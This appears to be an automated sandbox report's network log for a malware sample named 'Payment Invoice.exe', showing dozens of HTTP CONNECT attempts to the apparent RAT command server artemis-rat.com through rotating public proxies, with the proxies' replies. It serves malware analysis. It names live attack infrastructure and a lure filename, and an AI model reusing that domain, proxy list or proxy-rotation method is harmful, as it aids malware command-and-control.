                                                                Mar 11, 2024 16:15:18.948097944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1029192.168.2.45300572.49.49.11310347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.975781918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1030192.168.2.453009185.101.16.52807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.977390051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1031192.168.2.45299395.70.220.17341537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.979053974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1032192.168.2.453052159.65.77.16885857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.040108919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1033192.168.2.452964223.112.53.210257076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.040363073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.385466099 CET65INHTTP/1.1 200 Connection established
                                                                Proxy-Agent: gost/2.11.4


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1034192.168.2.453036193.239.58.9280817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.040477991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1035192.168.2.453037185.49.30.580817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.045236111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1036192.168.2.452887183.234.215.1184437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.052238941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.651807070 CET536INHTTP/1.1 405 Not Allowed
                                                                Server: nginx/1.24.0
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 559
                                                                Connection: keep-alive
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73
                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.24.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to dis


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1037192.168.2.451808142.54.235.941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.052503109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1038192.168.2.45304245.60.186.208274887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.053028107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1039192.168.2.452583192.163.202.88101857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.060725927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.214360952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.214636087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.214633942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.323560953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1040192.168.2.45305123.19.244.10910807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.063343048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1041192.168.2.453069104.16.213.202807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.063520908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.220261097 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1042192.168.2.45258566.248.237.227567407076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.063719034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.214399099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.214638948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.214633942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.323568106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:55.323784113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:07.327442884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:31.323621988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1043192.168.2.453120172.67.69.9807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.064199924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.220619917 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1044192.168.2.453040185.82.218.5210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.064367056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1045192.168.2.453066162.214.102.195608917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.064378023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.589441061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278819084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1046192.168.2.45259245.61.188.134444997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.064696074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1047192.168.2.452557129.213.150.205807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.064805984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1048192.168.2.453147104.25.64.27807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.065001011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.221050978 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1049192.168.2.451267189.240.60.16490907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.065290928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.343611956 CET72INHTTP/1.1 200 Connection established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1050192.168.2.45307013.59.156.16731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.088274002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.304817915 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1051192.168.2.45317274.48.7.43807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.088419914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.261043072 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.25.3
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1052192.168.2.45305543.163.192.3156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.089843035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1053192.168.2.45305870.166.167.55577457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.089941025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1054192.168.2.45123854.37.196.18980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.094984055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.248398066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.321805000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.480047941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.479868889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:55.479831934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:07.589250088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:31.589261055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1055192.168.2.45321143.153.81.604437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.095679045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
